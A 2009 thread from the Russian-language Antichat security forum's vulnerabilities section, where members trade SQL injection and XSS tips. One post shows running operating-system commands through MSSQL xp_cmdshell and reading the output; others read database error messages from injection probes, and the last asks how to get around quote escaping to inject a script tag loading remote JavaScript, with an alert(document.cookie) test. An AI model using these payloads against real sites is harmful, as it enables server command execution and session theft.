ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10361  
Старый 23.11.2009, 12:27
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

таблицу лучше создавать с полем id, чтобы было удобнее выводить результат:
CREATE TABLE temp (id int IDENTITY, text nvarchar(8000));
INSERT INTO temp exec master..xp_cmdshell dir;
SELECT text FROM temp WHERE id = 1
 
Ответить с цитированием

  #10362  
Старый 23.11.2009, 16:01
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706

Репутация: -1
По умолчанию

Пасип...).
 
Ответить с цитированием

  #10363  
Старый 23.11.2009, 17:25
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706

Репутация: -1
По умолчанию

Что за ошибка такая ?

type Exception report

message

description The server encountered an internal error () that prevented it from fulfilling this request.

exception

java.lang.NumberFormatException: For input string: "58'"
java.lang.NumberFormatException.forInputString(Num berFormatException.java:48)
java.lang.Integer.parseInt(Integer.java:456)
java.lang.Integer.parseInt(Integer.java:497)
javax.servlet.http.HttpServlet.service(HttpServlet .java:627)
javax.servlet.http.HttpServlet.service(HttpServlet .java:729)
com.evalica.util.http.upload.MultipartRequestFilte r.doFilter(MultipartRequestFilter.java:28)
com.evalica.cm.core.session.SessionCookieFilter.do Filter(SessionCookieFilter.java:47)


note The full stack trace of the root cause is available in the Apache Tomcat/5.5.27 logs.

Ошибка базы или сервера ?
 
Ответить с цитированием

  #10364  
Старый 23.11.2009, 17:37
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

Ошибка ява-приложения.
java.lang.NumberFormatException: For input string: "58'"
Фактически сервер говорит, что переданная мне строка - не число.
 
Ответить с цитированием

  #10365  
Старый 23.11.2009, 19:07
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

честно сказать такое в первые вижу:
Цитата:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 3.51 Driver][mysqld-4.0.20a-nt]You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1,2,3,4,5, '2009-11-23 15:04')' at line 1

/inc/product_details/get_cats.inc, line 5
тут MSSQL или MYSQL ?
 
Ответить с цитированием

  #10366  
Старый 23.11.2009, 19:08
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

если есть надпись Microsoft - то явно не просто Mysql, как сам считаешь?
 
Ответить с цитированием

  #10367  
Старый 23.11.2009, 19:10
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021

Репутация: 676


По умолчанию

Цитата:
Сообщение от Pashkela  
если есть надпись Microsoft - то явно не просто Mysql, как сам считаешь?
а если есть надпись mysqld-4.0.20a-nt ?
 
Ответить с цитированием

  #10368  
Старый 23.11.2009, 19:10
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

Цитата:
Сообщение от YuNi|[c  
честно сказать такое в первые вижу:

тут MSSQL или MYSQL ?
MySQL
__________________
Feci, quod potui. Faciant meliora potentes.
 
Ответить с цитированием

  #10369  
Старый 23.11.2009, 19:16
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Цитата:
Сообщение от Pashkela  
если есть надпись Microsoft - то явно не просто Mysql, как сам считаешь?
http://ru.wikipedia.org/wiki/ODBC - от туда и надпись Microsoft
А БД там MySQL.

Ты так и не научился что либо читать, а по прежнему уверено отвечаешь на вопросы, которые сам не понимаешь.

Последний раз редактировалось Grey; 23.11.2009 в 19:20..
 
Ответить с цитированием

  #10370  
Старый 23.11.2009, 22:40
xofffff
Познающий
Регистрация: 16.11.2009
Сообщений: 38
Провел на форуме:
261594

Репутация: 15
По умолчанию

Ситуация в том что я нашел xss но при попытке засунуть ей вот этот скрипт
PHP код:
<SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT
Нечего не происходит так как у него фильтр на " и %22 его аналог фильтр заключается в том что перед ним он ставит знак \ а именно
PHP код:
<SCRIPT type=\"text/javascript\" src=\"http://your_site.com/js.js\"></SCRIPT> 
Его можно как нибудь обойти или это все?
просто когда пишешь
PHP код:
<script>alert(document.cookie)</script
Все показывает.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ